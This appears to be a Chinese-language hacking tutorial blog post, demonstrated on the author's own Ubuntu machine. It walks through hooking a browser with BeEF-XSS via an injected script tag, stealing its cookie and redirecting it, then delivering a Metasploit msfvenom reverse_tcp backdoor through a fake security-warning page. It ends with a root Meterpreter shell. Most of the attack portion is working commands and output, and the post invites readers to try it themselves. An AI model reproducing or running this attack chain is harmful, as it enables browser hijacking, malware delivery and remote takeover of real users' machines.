本机是Ubuntu系统 所以我们直接本机实战好了 大晚上的 睡不着 写篇文章在睡
先来讲一下劫持浏览器
劫持浏览器用到的工具为beef-xss
在Ubuntu中 如果你想安装的话 直接吧kali源添加进去后
apt-get install beef-xss //安装
打开的话 直接beef-xss
如下图
root@xaiSec:/home/hacker# beef-xss Please wait as BeEF services are started. You might need to refresh your browser once it opens. UI URL: [url]http://127.0.0.1:3000/ui/panel[/url] Hook: <script src="http://<IP>:3000/hook.js"></script> Example: <script src="http://127.0.0.1:3000/hook.js"></script>
然后他会自动弹出一个网站http://127.0.0.1:3000/ui/authentication
网站是beef-xss平台 就相当于xss平台一样 用于接收cookie等信息的
<script src=”http://<IP>:3000/hook.js”></script> ip改成我们本机在内网中的ip即可
ifconfig 查看
192.168.0.3
那么 xss在内网中的链接为 192.168.0.3:3000/hook.js
打开看一下 会看到一些代码 这里我们不用管他
直接吧xss代码加入到html里面
当然也可以配合dns欺骗 和xerosploit的话会达到更好的效果 这里就不演示了
接着我们来打开test.html一下
test.html 里面有我们的xss代码
如下图
这个时候我们的beef-xss平台以及提示上线
双击192.168.0.3
因为我们这是本机测试的
双击后就会看到我们的浏览器版本信息 客户端信息等
表单如下
Browser Version: UNKNOWN
Initialization
Browser UA String: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Initialization
Browser Language: zh-CN
Initialization
Browser Platform: Linux x86_64
Initialization
Browser Plugins: IcedTea-Web Plugin (using IcedTea-Web 1.6.2 (1.6.2-3.1ubuntu3)),Shockwave Flash
Initialization
Window Size: Width: 1153, Height: 557
Initialization
Category: Browser Components (12 Items)
Flash: Yes
Initialization
VBScript: No
Initialization
PhoneGap: No
Initialization
Google Gears: No
Initialization
Web Sockets: Yes
Initialization
QuickTime: No
Initialization
RealPlayer: No
Initialization
Windows Media Player: No
Initialization
WebRTC: Yes
Initialization
ActiveX: No
Initialization
Session Cookies: Yes
Initialization
Persistent Cookies: Yes
Initialization
Category: Hooked Page (5 Items)
Page Title: Unknown
Initialization
Page URI: file:///home/hacker/%E6%A1%8C%E9%9D%A2/test.html
Initialization
Page Referrer: Unknown
Initialization
Host Name/IP: Unknown
Initialization
Cookies: BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl
Initialization
Category: Host (8 Items)
Host Name/IP: 192.168.0.3
Initialization
Date: Tue Mar 14 2017 04:32:22 GMT+0800 (CST)
Initialization
Operating System: Linux
Initialization
Hardware: Laptop
Initialization
CPU: x86_64
Initialization
Default Browser: Unknown
Initialization
Screen Size: Width: 1366, Height: 768, Colour Depth: 24
Initialization
[backcolor=rgb(223, 232, 246) !important]
Touch Screen: No
Initialization
我们来让他跳转一下
当然 如果目标是xp或者Windows7(没打补丁的Windows7)的话 会直接劫持 ps:msf生成恶意地址 beef-xss劫持
如果我们让他跳转到 http://bbs.ichunqiu.com/
点击commands
Browser (53) Hooked Domain (25) Redirect Browser
当然也有很多模块需要各种自己去测试 比如 盗取cookie
data: cookie=BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl
继续来演示跳转
Redirect URL: 后面设置我们要跳转到的网站上
Execute //执行
这个时候你会发现我们的火狐浏览器已经成功跳转到了i春秋论坛
同样的原理
我们msf生成一个Linux后门
然后放到/var/www/html下
网址为:192.168.0.3/
Metasploit 生成后门
msfVENOM -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222
root@xaiSec:/home/hacker# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 71 bytes
Final size of elf file: 155 bytes
Saved as: test222
root@xaiSec:/home/hacker#
赋予执行权限
root@xaiSec:/home/hacker# chmod +x ./test222
root@xaiSec:/home/hacker#
配置Metasploit
root@xaiSec:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.14.1-dev-f02c323c7ed3ad6b5769691e03aefd1b45a36fbf]
+ -- --=[ 1628 exploits - 927 auxiliary - 282 post ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: [url]http://r-7.co/trymsp[/url] ]
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.3
lhost => 192.168.0.3
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.0.3:4444
[*] Starting the payload handler...
接着我们把后门复制到/var/www/html下
cp test222 /var/www/html/
root@xaiSec:/home/hacker# cp test222 /var/www/html/
root@xaiSec:/home/hacker# cd /var/www/html
root@xaiSec:/var/www/html# ls
index.html index.lighttpd.html test222 test222.html
root@xaiSec:/var/www/html#
从而打开192.168.0.3/test222
下载后门 //
接着我们让beef-xss 劫持浏览器跳转到 192.168.0.3/test222
可以自己写一个html 大致内容就是 你的系统安全问题 xxxxxx Ps:原谅我语文不好 = =
劫持如下
我们发现已经跳转过来了
然后下载 自己运行下后门测试
……………………………………………………….. 此处省略n个字
运行后我们发现msf上线了
root@xaiSec:/var/www/html# ./test222
shell一下 然后回车
我们会看到已经拿到了这样一个权限
尝试执行下 ifconfig
成功执行
route //获取路由表信息
我们拿到了终端权限
接着Ctrl+c 退出shell终端
返回到meterpreter > help //查看帮助
系统命令 以下是经过谷歌翻译↓
核心命令
=============
命令说明
------- -----------
?帮助菜单
背景背景当前会话
bgkill杀死一个背景meterpreter脚本
bglist列出运行的后台脚本
bgrun执行meterpreter脚本作为后台线程
channel显示信息或控制活动通道
close关闭通道
disable_unicode_encoding禁用unicode字符串的编码
enable_unicode_encoding启用Unicode字符串的编码
exit终止meterpreter会话
get_timeouts获取当前会话超时值
帮助菜单
info显示有关Post模块的信息
irb进入irb脚本模式
load加载一个或多个meterpreter扩展
machine_id获取连接到会话的计算机的MSF ID
migrate将服务器迁移到另一个进程
quit终止meterpreter会话
读取从通道读取数据
resource运行存储在文件中的命令
run执行meterpreter脚本或Post模块
会话快速切换到另一个会话
set_timeouts设置当前会话超时值
睡眠强制Meterpreter去安静,然后重新建立会话。
transport更改当前的传输机制
使用“load”的已弃用别名
uuid获取当前会话的UUID
write将数据写入通道
Stdapi:文件系统命令
============================
命令说明
------- -----------
cat将文件的内容读取到屏幕
cd更改目录
checksum检索文件的校验和
cp将源复制到目标
dir列表文件(ls的别名)
下载下载文件或目录
编辑编辑文件
getlwd打印本地工作目录
getwd打印工作目录
lcd更改本地工作目录
lpwd打印本地工作目录
ls列表文件
mkdir创建目录
mv将源移动到目标
pwd打印工作目录
rm删除指定的文件
rmdir删除目录
upload上传文件或目录
Stdapi:网络命令
=========================
命令说明
------- -----------
arp显示主机ARP缓存
ifconfig显示接口
ipconfig显示接口
netstat显示网络连接
portfwd将本地端口转发到远程服务
route查看和修改路由表
Stdapi:系统命令
=====================
命令说明
------- -----------
execute执行命令
getenv获取一个或多个环境变量值
getpid获取当前进程标识符
getprivs尝试启用当前进程可用的所有特权
getuid获取服务器正在运行的用户
kill终止进程
localtime显示目标系统的本地日期和时间
ps列出正在运行的进程
rev2self在远程机器上调用RevertToSelf()
shell放入系统命令shell
suspend挂起或恢复进程列表
sysinfo获取有关远程系统(如操作系统)的信息
ps //查看进程
getuid // 获取服务器正在运行的用户
sysinfo // 查看目标机系统信息,如机器名,操作系统等
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : xaiSec
OS : Linux xaiSec 4.10.0-11-generic #13-Ubuntu SMP Wed Mar 1 21:27:28 UTC 2017 (x86_64)
Architecture : x64
Meterpreter : x86/linux
meterpreter >
还有很多好玩的 需要大家自己去测试 mdzz 睡觉了 大晚上的 给你们写这篇文章 各位大佬给点好评呗
结束语:勿忘初心 方得始终.
原文地址:https://my.oschina.net/ichunqiu/blog/860704